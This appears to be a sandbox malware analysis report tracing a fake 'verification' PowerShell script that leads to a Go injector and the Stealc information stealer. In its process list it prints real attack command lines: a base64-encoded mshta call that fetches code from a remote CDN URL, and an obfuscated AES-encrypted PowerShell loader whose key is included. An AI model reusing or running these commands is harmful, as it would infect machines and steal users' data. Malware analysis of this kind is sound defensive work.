                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:13:09:57
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:13:09:59
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:13:09:59
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\mshta.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1
                                  Imagebase:0x7ff725720000
                                  File size:14'848 bytes
                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:13:10:01
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Imagebase:0x7ff6eef20000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:5
                                  Start time:13:10:03
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3)
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:13:10:03
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:8
                                  Start time:13:10:17
                                  Start date:10/08/2024
                                  Path:C:\Users\user\AppData\Roaming\0SmartAssem.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Roaming\0SmartAssem.exe"
                                  Imagebase:0x7ff74ca60000
                                  File size:14'349'824 bytes
                                  MD5 hash:517C4A0A27D1C022A3319AF316407810
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Go lang
                                  Yara matches:
                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000008.00000002.1996165603.000000C000380000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000000.1897589705.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000002.2003314361.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 18%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:11
                                  Start time:13:10:27
                                  Start date:10/08/2024
                                  Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  Imagebase:0x6e0000
                                  File size:231'736 bytes
                                  MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Executed Functions

                                    Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1735351085.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                    • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                    • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

                                    Executed Functions

                                    Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1725285083.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                    • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                    • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45

                                    Executed Functions

                                    Function 000002376F810FA9 Relevance: .0, Instructions: 5COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000003.2359062498.000002376F810000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002376F810000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_3_2376f810000_mshta.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                    • Instruction ID: 4f2e2da35085cc787484103cf7c442a14316674796d004457b72a027de24d145
                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                    • Instruction Fuzzy Hash: E090024449DD0B55D82551910C5B25C50446388190FD465C0541690184D44D03B66652
                                    Function 000002376F810FB1 Relevance: .0, Instructions: 5COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000003.2359062498.000002376F810000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002376F810000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_3_2376f810000_mshta.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                    • Instruction ID: 4f2e2da35085cc787484103cf7c442a14316674796d004457b72a027de24d145
                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                    • Instruction Fuzzy Hash: E090024449DD0B55D82551910C5B25C50446388190FD465C0541690184D44D03B66652
                                    Function 000002376F810FB9 Relevance: .0, Instructions: 5COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000003.2359062498.000002376F810000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002376F810000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_3_2376f810000_mshta.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                    • Instruction ID: 4f2e2da35085cc787484103cf7c442a14316674796d004457b72a027de24d145
                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                    • Instruction Fuzzy Hash: E090024449DD0B55D82551910C5B25C50446388190FD465C0541690184D44D03B66652

                                    Execution Graph

                                    Execution Coverage:13.6%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0.7%
                                    Total number of Nodes:1508
                                    Total number of Limit Nodes:3
                                    execution_graph 12799 3051190 12804 3067380 12799->12804 12801 305119e 12803 30511b7 12801->12803 12808 30672f0 12801->12808 12805 30673b6 GetComputerNameA 12804->12805 12807 30673d9 12805->12807 12807->12801 12809 3067326 GetUserNameA 12808->12809 12811 3067363 12809->12811 12811->12803 12812 3066593 12813 3066551 12812->12813 12816 30655f0 12813->12816 12815 30665b6 12817 30655fd 12816->12817 12896 30526f0 12817->12896 12821 3065783 13533 3064ff0 12821->13533 12823 30657a3 13538 3066fa0 12823->13538 12825 3065887 13542 30548d0 12825->13542 12827 306589e 13548 30612b0 12827->13548 12829 30658a6 13556 30559b0 12829->13556 12831 30658e3 13564 3060b60 12831->13564 12833 30658ee 12834 30559b0 6 API calls 12833->12834 12835 306592c 12834->12835 13570 30608a0 12835->13570 12837 3065937 12838 30559b0 6 API calls 12837->12838 12839 3065973 12838->12839 13576 3060a50 12839->13576 12841 306597e 13582 3061520 12841->13582 12843 306599a 13592 3055000 12843->13592 12845 30659bb 13596 3060580 12845->13596 12847 3065a40 12848 30559b0 6 API calls 12847->12848 12849 3065a80 12848->12849 13609 3060c80 12849->13609 12851 3065a8b 13615 3051ec0 12851->13615 12853 3065ad0 12854 3065b72 12853->12854 12855 3065ae0 12853->12855 12856 30559b0 6 API calls 12854->12856 12857 30559b0 6 API calls 12855->12857 12858 3065b9f 12856->12858 12859 3065b1a 12857->12859 13631 3063070 12858->13631 13621 3060de0 12859->13621 12862 3065b25 13627 30638d0 12862->13627 12863 3065b6a 12866 3065beb 12863->12866 13638 3063bc0 memset 12863->13638 12867 3065c10 12866->12867 13658 3064260 12866->13658 12871 3065c35 12867->12871 13662 3064690 12867->13662 12868 3065bcc 13652 3064be0 12868->13652 12873 3065c5a 12871->12873 13676 3064850 memset 12871->13676 12874 3065c7f 12873->12874 13687 3064a20 12873->13687 12879 3065ca4 12874->12879 13693 3057750 12874->13693 12876 3065cf0 12883 3065d93 12876->12883 12884 3065d00 12876->12884 12880 3065cc9 12879->12880 13745 3064b30 12879->13745 12880->12876 13749 3068ab0 12880->13749 12885 30559b0 6 API calls 12883->12885 12886 30559b0 6 API calls 12884->12886 12887 3065dc0 12885->12887 12888 3065d3b 12886->12888 12889 3063070 6 API calls 12887->12889 12890 3060de0 2 API calls 12888->12890 12892 3065d8b 12889->12892 12891 3065d46 12890->12891 12893 30638d0 9 API calls 12891->12893 12894 30559b0 6 API calls 12892->12894 12893->12892 12895 3065dfc 12894->12895 12895->12815 13755 3054610 17 API calls 12896->13755 12898 3052704 12899 3054610 34 API calls 12898->12899 12900 3052727 12899->12900 12901 3054610 34 API calls 12900->12901 12902 3052740 12901->12902 12903 3054610 34 API calls 12902->12903 12904 3052759 12903->12904 12905 3054610 34 API calls 12904->12905 12906 3052786 12905->12906 12907 3054610 34 API calls 12906->12907 12908 305279f 12907->12908 12909 3054610 34 API calls 12908->12909 12910 30527b8 12909->12910 12911 3054610 34 API calls 12910->12911 12912 30527e5 12911->12912 12913 3054610 34 API calls 12912->12913 12914 30527fe 12913->12914 12915 3054610 34 API calls 12914->12915 12916 3052817 12915->12916 12917 3054610 34 API calls 12916->12917 12918 3052830 12917->12918 12919 3054610 34 API calls 12918->12919 12920 3052849 12919->12920 12921 3054610 34 API calls 12920->12921 12922 3052862 12921->12922 12923 3054610 34 API calls 12922->12923 12924 305287b 12923->12924 12925 3054610 34 API calls 12924->12925 12926 3052894 12925->12926 12927 3054610 34 API calls 12926->12927 12928 30528ad 12927->12928 12929 3054610 34 API calls 12928->12929 12930 30528c6 12929->12930 12931 3054610 34 API calls 12930->12931 12932 30528df 12931->12932 12933 3054610 34 API calls 12932->12933 12934 30528f8 12933->12934 12935 3054610 34 API calls 12934->12935 12936 3052911 12935->12936 12937 3054610 34 API calls 12936->12937 12938 305292a 12937->12938 12939 3054610 34 API calls 12938->12939 12940 3052943 12939->12940 12941 3054610 34 API calls 12940->12941 12942 305295c 12941->12942 12943 3054610 34 API calls 12942->12943 12944 3052975 12943->12944 12945 3054610 34 API calls 12944->12945 12946 305298e 12945->12946 12947 3054610 34 API calls 12946->12947 12948 30529a7 12947->12948 12949 3054610 34 API calls 12948->12949 12950 30529c0 12949->12950 12951 3054610 34 API calls 12950->12951 12952 30529d9 12951->12952 12953 3054610 34 API calls 12952->12953 12954 30529f2 12953->12954 12955 3054610 34 API calls 12954->12955 12956 3052a0b 12955->12956 12957 3054610 34 API calls 12956->12957 12958 3052a24 12957->12958 12959 3054610 34 API calls 12958->12959 12960 3052a3d 12959->12960 12961 3054610 34 API calls 12960->12961 12962 3052a56 12961->12962 12963 3054610 34 API calls 12962->12963 12964 3052a6f 12963->12964 12965 3054610 34 API calls 12964->12965 12966 3052a88 12965->12966 12967 3054610 34 API calls 12966->12967 12968 3052aa1 12967->12968 12969 3054610 34 API calls 12968->12969 12970 3052aba 12969->12970 12971 3054610 34 API calls 12970->12971 12972 3052ad3 12971->12972 12973 3054610 34 API calls 12972->12973 12974 3052aec 12973->12974 12975 3054610 34 API calls 12974->12975 12976 3052b05 12975->12976 12977 3054610 34 API calls 12976->12977 12978 3052b1e 12977->12978 12979 3054610 34 API calls 12978->12979 12980 3052b37 12979->12980 12981 3054610 34 API calls 12980->12981 12982 3052b50 12981->12982 12983 3054610 34 API calls 12982->12983 12984 3052b69 12983->12984 12985 3054610 34 API calls 12984->12985 12986 3052b82 12985->12986 12987 3054610 34 API calls 12986->12987 12988 3052b9b 12987->12988 12989 3054610 34 API calls 12988->12989 12990 3052bb4 12989->12990 12991 3054610 34 API calls 12990->12991 12992 3052bcd 12991->12992 12993 3054610 34 API calls 12992->12993 12994 3052be6 12993->12994 12995 3054610 34 API calls 12994->12995 12996 3052bff 12995->12996 12997 3054610 34 API calls 12996->12997 12998 3052c18 12997->12998 12999 3054610 34 API calls 12998->12999 13000 3052c31 12999->13000 13001 3054610 34 API calls 13000->13001 13002 3052c4a 13001->13002 13003 3054610 34 API calls 13002->13003 13004 3052c63 13003->13004 13005 3054610 34 API calls 13004->13005 13006 3052c7c 13005->13006 13007 3054610 34 API calls 13006->13007 13008 3052c95 13007->13008 13009 3054610 34 API calls 13008->13009 13010 3052cae 13009->13010 13011 3054610 34 API calls 13010->13011 13012 3052cc7 13011->13012 13013 3054610 34 API calls 13012->13013 13014 3052ce0 13013->13014 13015 3054610 34 API calls 13014->13015 13016 3052cf9 13015->13016 13017 3054610 34 API calls 13016->13017 13018 3052d12 13017->13018 13019 3054610 34 API calls 13018->13019 13020 3052d2b 13019->13020 13021 3054610 34 API calls 13020->13021 13022 3052d44 13021->13022 13023 3054610 34 API calls 13022->13023 13024 3052d5d 13023->13024 13025 3054610 34 API calls 13024->13025 13026 3052d76 13025->13026 13027 3054610 34 API calls 13026->13027 13028 3052d8f 13027->13028 13029 3054610 34 API calls 13028->13029 13030 3052da8 13029->13030 13031 3054610 34 API calls 13030->13031 13032 3052dc1 13031->13032 13033 3054610 34 API calls 13032->13033 13034 3052dda 13033->13034 13035 3054610 34 API calls 13034->13035 13036 3052df3 13035->13036 13037 3054610 34 API calls 13036->13037 13038 3052e0c 13037->13038 13039 3054610 34 API calls 13038->13039 13040 3052e25 13039->13040 13041 3054610 34 API calls 13040->13041 13042 3052e3e 13041->13042 13043 3054610 34 API calls 13042->13043 13044 3052e57 13043->13044 13045 3054610 34 API calls 13044->13045 13046 3052e70 13045->13046 13047 3054610 34 API calls 13046->13047 13048 3052e89 13047->13048 13049 3054610 34 API calls 13048->13049 13050 3052ea2 13049->13050 13051 3054610 34 API calls 13050->13051 13052 3052ebb 13051->13052 13053 3054610 34 API calls 13052->13053 13054 3052ed4 13053->13054 13055 3054610 34 API calls 13054->13055 13056 3052eed 13055->13056 13057 3054610 34 API calls 13056->13057 13058 3052f06 13057->13058 13059 3054610 34 API calls 13058->13059 13060 3052f1f 13059->13060 13061 3054610 34 API calls 13060->13061 13062 3052f38 13061->13062 13063 3054610 34 API calls 13062->13063 13064 3052f51 13063->13064 13065 3054610 34 API calls 13064->13065 13066 3052f6a 13065->13066 13067 3054610 34 API calls 13066->13067 13068 3052f83 13067->13068 13069 3054610 34 API calls 13068->13069 13070 3052f9c 13069->13070 13071 3054610 34 API calls 13070->13071 13072 3052fb5 13071->13072 13073 3054610 34 API calls 13072->13073 13074 3052fce 13073->13074 13075 3054610 34 API calls 13074->13075 13076 3052fe7 13075->13076 13077 3054610 34 API calls 13076->13077 13078 3053000 13077->13078 13079 3054610 34 API calls 13078->13079 13080 3053019 13079->13080 13081 3054610 34 API calls 13080->13081 13082 3053032 13081->13082 13083 3054610 34 API calls 13082->13083 13084 305304b 13083->13084 13085 3054610 34 API calls 13084->13085 13086 3053064 13085->13086 13087 3054610 34 API calls 13086->13087 13088 305307d 13087->13088 13089 3054610 34 API calls 13088->13089 13090 3053096 13089->13090 13091 3054610 34 API calls 13090->13091 13092 30530af 13091->13092 13093 3054610 34 API calls 13092->13093 13094 30530c8 13093->13094 13095 3054610 34 API calls 13094->13095 13096 30530e1 13095->13096 13097 3054610 34 API calls 13096->13097 13098 30530fa 13097->13098 13099 3054610 34 API calls 13098->13099 13100 3053113 13099->13100 13101 3054610 34 API calls 13100->13101 13102 305312c 13101->13102 13103 3054610 34 API calls 13102->13103 13104 3053145 13103->13104 13105 3054610 34 API calls 13104->13105 13106 305315e 13105->13106 13107 3054610 34 API calls 13106->13107 13108 3053177 13107->13108 13109 3054610 34 API calls 13108->13109 13110 3053190 13109->13110 13111 3054610 34 API calls 13110->13111 13112 30531a9 13111->13112 13113 3054610 34 API calls 13112->13113 13114 30531c2 13113->13114 13115 3054610 34 API calls 13114->13115 13116 30531db 13115->13116 13117 3054610 34 API calls 13116->13117 13118 30531f4 13117->13118 13119 3054610 34 API calls 13118->13119 13120 305320d 13119->13120 13121 3054610 34 API calls 13120->13121 13122 3053226 13121->13122 13123 3054610 34 API calls 13122->13123 13124 305323f 13123->13124 13125 3054610 34 API calls 13124->13125 13126 3053258 13125->13126 13127 3054610 34 API calls 13126->13127 13128 3053271 13127->13128 13129 3054610 34 API calls 13128->13129 13130 305328a 13129->13130 13131 3054610 34 API calls 13130->13131 13132 30532a3 13131->13132 13133 3054610 34 API calls 13132->13133 13134 30532bc 13133->13134 13135 3054610 34 API calls 13134->13135 13136 30532d5 13135->13136 13137 3054610 34 API calls 13136->13137 13138 30532ee 13137->13138 13139 3054610 34 API calls 13138->13139 13140 3053307 13139->13140 13141 3054610 34 API calls 13140->13141 13142 3053320 13141->13142 13143 3054610 34 API calls 13142->13143 13144 3053339 13143->13144 13145 3054610 34 API calls 13144->13145 13146 3053352 13145->13146 13147 3054610 34 API calls 13146->13147 13148 305336b 13147->13148 13149 3054610 34 API calls 13148->13149 13150 3053384 13149->13150 13151 3054610 34 API calls 13150->13151 13152 305339d 13151->13152 13153 3054610 34 API calls 13152->13153 13154 30533b6 13153->13154 13155 3054610 34 API calls 13154->13155 13156 30533cf 13155->13156 13157 3054610 34 API calls 13156->13157 13158 30533e8 13157->13158 13159 3054610 34 API calls 13158->13159 13160 3053401 13159->13160 13161 3054610 34 API calls 13160->13161 13162 305341a 13161->13162 13163 3054610 34 API calls 13162->13163 13164 3053433 13163->13164 13165 3054610 34 API calls 13164->13165 13166 305344c 13165->13166 13167 3054610 34 API calls 13166->13167 13168 3053465 13167->13168 13169 3054610 34 API calls 13168->13169 13170 305347e 13169->13170 13171 3054610 34 API calls 13170->13171 13172 3053497 13171->13172 13173 3054610 34 API calls 13172->13173 13174 30534b0 13173->13174 13175 3054610 34 API calls 13174->13175 13176 30534c9 13175->13176 13177 3054610 34 API calls 13176->13177 13178 30534e2 13177->13178 13179 3054610 34 API calls 13178->13179 13180 30534fb 13179->13180 13181 3054610 34 API calls 13180->13181 13182 3053514 13181->13182 13183 3054610 34 API calls 13182->13183 13184 305352d 13183->13184 13185 3054610 34 API calls 13184->13185 13186 3053546 13185->13186 13187 3054610 34 API calls 13186->13187 13188 305355f 13187->13188 13189 3054610 34 API calls 13188->13189 13190 3053578 13189->13190 13191 3054610 34 API calls 13190->13191 13192 3053591 13191->13192 13193 3054610 34 API calls 13192->13193 13194 30535aa 13193->13194 13195 3054610 34 API calls 13194->13195 13196 30535c3 13195->13196 13197 3054610 34 API calls 13196->13197 13198 30535dc 13197->13198 13199 3054610 34 API calls 13198->13199 13200 30535f5 13199->13200 13201 3054610 34 API calls 13200->13201 13202 305360e 13201->13202 13203 3054610 34 API calls 13202->13203 13204 3053627 13203->13204 13205 3054610 34 API calls 13204->13205 13206 3053640 13205->13206 13207 3054610 34 API calls 13206->13207 13208 3053659 13207->13208 13209 3054610 34 API calls 13208->13209 13210 3053672 13209->13210 13211 3054610 34 API calls 13210->13211 13212 305368b 13211->13212 13213 3054610 34 API calls 13212->13213 13214 30536a4 13213->13214 13215 3054610 34 API calls 13214->13215 13216 30536bd 13215->13216 13217 3054610 34 API calls 13216->13217 13218 30536d6 13217->13218 13219 3054610 34 API calls 13218->13219 13220 30536ef 13219->13220 13221 3054610 34 API calls 13220->13221 13222 3053708 13221->13222 13223 3054610 34 API calls 13222->13223 13224 3053721 13223->13224 13225 3054610 34 API calls 13224->13225 13226 305373a 13225->13226 13227 3054610 34 API calls 13226->13227 13228 3053753 13227->13228 13229 3054610 34 API calls 13228->13229 13230 305376c 13229->13230 13231 3054610 34 API calls 13230->13231 13232 3053785 13231->13232 13233 3054610 34 API calls 13232->13233 13234 305379e 13233->13234 13235 3054610 34 API calls 13234->13235 13236 30537b7 13235->13236 13237 3054610 34 API calls 13236->13237 13238 30537d0 13237->13238 13239 3054610 34 API calls 13238->13239 13240 30537e9 13239->13240 13241 3054610 34 API calls 13240->13241 13242 3053802 13241->13242 13243 3054610 34 API calls 13242->13243 13244 305381b 13243->13244 13245 3054610 34 API calls 13244->13245 13246 3053834 13245->13246 13247 3054610 34 API calls 13246->13247 13248 305384d 13247->13248 13249 3054610 34 API calls 13248->13249 13250 3053866 13249->13250 13251 3054610 34 API calls 13250->13251 13252 305387f 13251->13252 13253 3054610 34 API calls 13252->13253 13254 3053898 13253->13254 13255 3054610 34 API calls 13254->13255 13256 30538b1 13255->13256 13257 3054610 34 API calls 13256->13257 13258 30538ca 13257->13258 13259 3054610 34 API calls 13258->13259 13260 30538e3 13259->13260 13261 3054610 34 API calls 13260->13261 13262 30538fc 13261->13262 13263 3054610 34 API calls 13262->13263 13264 3053915 13263->13264 13265 3054610 34 API calls 13264->13265 13266 305392e 13265->13266 13267 3054610 34 API calls 13266->13267 13268 3053947 13267->13268 13269 3054610 34 API calls 13268->13269 13270 3053960 13269->13270 13271 3054610 34 API calls 13270->13271 13272 3053979 13271->13272 13273 3054610 34 API calls 13272->13273 13274 3053992 13273->13274 13275 3054610 34 API calls 13274->13275 13276 30539ab 13275->13276 13277 3054610 34 API calls 13276->13277 13278 30539c4 13277->13278 13279 3054610 34 API calls 13278->13279 13280 30539dd 13279->13280 13281 3054610 34 API calls 13280->13281 13282 30539f6 13281->13282 13283 3054610 34 API calls 13282->13283 13284 3053a0f 13283->13284 13285 3054610 34 API calls 13284->13285 13286 3053a28 13285->13286 13287 3054610 34 API calls 13286->13287 13288 3053a41 13287->13288 13289 3054610 34 API calls 13288->13289 13290 3053a5a 13289->13290 13291 3054610 34 API calls 13290->13291 13292 3053a73 13291->13292 13293 3054610 34 API calls 13292->13293 13294 3053a8c 13293->13294 13295 3054610 34 API calls 13294->13295 13296 3053aa5 